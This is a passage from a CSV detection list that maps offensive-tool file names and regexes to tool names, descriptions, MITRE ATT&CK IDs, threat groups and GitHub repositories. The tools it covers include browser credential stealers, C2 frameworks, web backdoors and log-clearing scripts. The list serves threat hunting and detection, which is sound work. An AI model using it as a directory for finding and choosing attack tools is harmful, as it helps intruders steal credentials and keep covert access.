- T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation 
tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","6030" "*/ChromeDump/*",".{0,1000}\/ChromeDump\/.{0,1000}","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","N/A","1","55","1","2024-10-12T14:07:36Z","2023-01-26T20:44:06Z","6031" "*/ChromeKatz.git*",".{0,1000}\/ChromeKatz\.git.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","6032" "*/chromepasswordlist.csv*",".{0,1000}\/chromepasswordlist\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","6033" "*/chromepasswords.py*",".{0,1000}\/chromepasswords\.py.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","6034" "*/ChromeStealer.git*",".{0,1000}\/ChromeStealer\.git.{0,1000}","offensive_tool_keyword","ChromeStealer","extract and decrypt stored passwords from Google Chrome","T1555.003 - T1003.001 - T1552.001","TA0006 ","N/A","N/A","Credential 
Access","https://github.com/BernKing/ChromeStealer","1","1","N/A","N/A","8","2","145","18","2024-07-25T08:27:10Z","2024-07-14T13:27:30Z","6035" "*/chromium_based_browsers.py*",".{0,1000}\/chromium_based_browsers\.py.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","6036" "*/chromium_history.py*",".{0,1000}\/chromium_history\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","6037" "*/chromium_logins.py*",".{0,1000}\/chromium_logins\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","6038" "*/Chunk-Proxy.git*",".{0,1000}\/Chunk\-Proxy\.git.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","1","N/A","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","6039" "*/ChunkProxyHandler.class*",".{0,1000}\/ChunkProxyHandler\.class.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for 
the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","0","#content","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","6040" "*/cics-enum.nse*",".{0,1000}\/cics\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6041" "*/cics-info.nse*",".{0,1000}\/cics\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6042" "*/cics-user-brute.nse*",".{0,1000}\/cics\-user\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6043" "*/cics-user-enum.nse*",".{0,1000}\/cics\-user\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6044" "*/CIMplant.exe*",".{0,1000}\/CIMplant\.exe.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","1","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","6045" "*/CIMplant.git*",".{0,1000}\/CIMplant\.git.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","1","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","6046" "*/CIMplant/Commander.cs*",".{0,1000}\/CIMplant\/Commander\.cs.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - 
T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","Scattered Spider*","Lateral Movement","https://github.com/RedSiege/CIMplant","1","1","N/A","N/A","10","2","199","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z","6047" "*/citrix-brute-xml.nse*",".{0,1000}\/citrix\-brute\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6048" "*/citrix-enum-apps.nse*",".{0,1000}\/citrix\-enum\-apps\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6049" "*/citrix-enum-apps-xml.nse*",".{0,1000}\/citrix\-enum\-apps\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6050" "*/citrix-enum-servers.nse*",".{0,1000}\/citrix\-enum\-servers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6051" "*/citrix-enum-servers-xml.nse*",".{0,1000}\/citrix\-enum\-servers\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6052" "*/clamav-exec.nse*",".{0,1000}\/clamav\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6053" "*/cleanRDP.bat*",".{0,1000}\/cleanRDP\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","CleanRDP.bat script erasing RDP traces used by Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","6054" "*/cleantracks.ps1",".{0,1000}\/cleantracks\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","6055" "*/clear_logs.py*",".{0,1000}\/clear_logs\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - 
T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#linux","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","6056" "*/ClearnEventRecordID.ps1*",".{0,1000}\/ClearnEventRecordID\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6057" "*/ClearnIpAddress.ps1*",".{0,1000}\/ClearnIpAddress\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6058" 
"*/ClearnTempLog.ps1*",".{0,1000}\/ClearnTempLog\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6059" "*/clfs_eop.exe*",".{0,1000}\/clfs_eop\.exe.{0,1000}","offensive_tool_keyword","POC","CVE-2024-6768: Improper validation of specified quantity in input produces an unrecoverable state in CLFS.sys causing a BSoD","T1499 - T1485","TA0043 - TA0042 - TA0005","N/A","N/A","Impact","https://github.com/fortra/CVE-2024-6768","1","1","N/A","N/A","10","1","16","4","2024-08-12T20:48:52Z","2024-07-18T07:52:46Z","6060" "*/ClickJack.exe",".{0,1000}\/ClickJack\.exe","offensive_tool_keyword","clickjack","automate abuse of clickonce applications","T1210 - T1204 - T1071.001","TA0001 - TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","6061" "*/clickme.docx*",".{0,1000}\/clickme\.docx.{0,1000}","offensive_tool_keyword","POC","CVE-2022-30190 Follina POC","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/onecloudemoji/CVE-2022-30190","1","1","N/A","N/A","N/A","2","104","27","2022-05-31T09:35:37Z","2022-05-31T06:45:25Z","6062" "*/client/beef.js*",".{0,1000}\/client\/beef\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","6063" "*/client/bof/*.asm*",".{0,1000}\/client\/bof\/.{0,1000}\.asm.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","N/A","10","10","1213","187","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z","6064" "*/Client/Commands/Enumeration.yaml*",".{0,1000}\/Client\/Commands\/Enumeration\.yaml.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","6065" 
"*/Client/Commands/Execution.yaml*",".{0,1000}\/Client\/Commands\/Execution\.yaml.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","6066" "*/Client/Commands/Injection.yaml*",".{0,1000}\/Client\/Commands\/Injection\.yaml.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","6067" "*/Client/Commands/Lateral.yaml*",".{0,1000}\/Client\/Commands\/Lateral\.yaml.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","6068" "*/Client/Commands/Tokens.yaml*",".{0,1000}\/Client\/Commands\/Tokens\.yaml.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","6069" "*/client/generated-stagers/*",".{0,1000}\/client\/generated\-stagers\/.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - 
T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","6070" "*/Client/Pages/Drones.razor*",".{0,1000}\/Client\/Pages\/Drones\.razor.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","6071" "*/Client/Pages/Payloads.razor*",".{0,1000}\/Client\/Pages\/Payloads\.razor.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","6072" 
"*/Client/Pages/Pivots.razor*",".{0,1000}\/Client\/Pages\/Pivots\.razor.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","6073" "*/clipboardinject.*",".{0,1000}\/clipboardinject\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","6074" "*/clipboardinject/*",".{0,1000}\/clipboardinject\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","6075" "*/ClipboardMITM.py*",".{0,1000}\/ClipboardMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability 
